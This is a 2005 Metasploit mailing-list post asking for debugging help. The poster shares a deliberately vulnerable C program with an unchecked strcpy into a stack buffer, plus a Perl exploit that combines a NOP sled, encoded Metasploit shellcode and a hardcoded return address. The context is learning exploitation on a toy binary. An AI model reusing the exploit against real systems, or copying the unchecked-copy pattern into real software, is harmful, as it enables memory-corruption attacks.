Metasploit mailing list archives
Nop sled problem
From: shellsangel at gmail.com (shells angel)
Date: Thu, 3 Nov 2005 14:29:31 +0100
Hi, At the moment I'm trying to exploit a trivial stack overflow in the following C program: ---stack_vuln1.c--- - Hide quoted text - #include <stdio.h> void vuln(char *str) { char buff[128]; strcpy(buff, str); printf("buff at %x contains: %s\n", buff, buff); } int main(int argc, char *argv[]) { vuln(argv[1]); return 0; } ---end of stack_vuln1.c--- To exploit the program I've written this exploit in perl: ---exploit code--- #!/usr/bin/perl -w use strict; # linux_ia32_exec - CMD=ls Size=64 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "\x31\xc9\x83\xe9\xf6\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb4". "\x96\x4d\x1d\x83\xeb\xfc\xe2\xf4\xde\x9d\x15\x84\xe6\xf0\x25\x30". "\xd7\x1f\xaa\x75\x9b\xe5\x25\x1d\xdc\xb9\x2f\x74\xda\x1f\xae\x4f". "\x5c\x95\x4d\x1d\xb4\xfa\x3e\x1d\xe3\xc5\xc4\xfc\x79\x16\x4d\x1d"; my $buffer_length = 128; my $eip_offset = $buffer_length + 4; my $nop_sled = "\x90" x ($eip_offset - length($shellcode)); my $ret = pack('i', 0xbffff938); my $payload = $nop_sled . $shellcode . $ret . "\0"; exec './stack_vuln1', $payload; ---end of exploit code--- As you can see, I borrowed the shellcode from the metasploit framework. This shellcode is located at this url: http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x813862cc%29&MODULE=linux_ia32_exec&MODE=GENERATE&OPT_CMD=ls&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload The problem I'm experiencing is somehow related to the nop sled. Whenever I change the line: my $payload = $nop_sled . $shellcode . $ret . "\0"; to: my $payload = $shellcode . $nop_sled . $ret . "\0"; the shellcode will get executed correctly. But as for as I understand, this renders the entire nop sled useless because the RET address will jump directly to the beginning of the shellcode. Otherwise(placing the shellcode behing the nop sled) the program crashes due to a Segmentation Fault. The odd thing is that the nopsled will get executed along with a part of the shellcode(checked it with GDB). Does anyone know what the the problem could be? Thanks in advance, shellsangel -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20051103/3f5fe0f8/attachment.htm>
Current thread:
- Nop sled problem shells angel (Nov 03)
- Nop sled problem mmiller at hick.org (Nov 03)
- Nop sled problem shells angel (Nov 03)
- Nop sled problem mmiller at hick.org (Nov 03)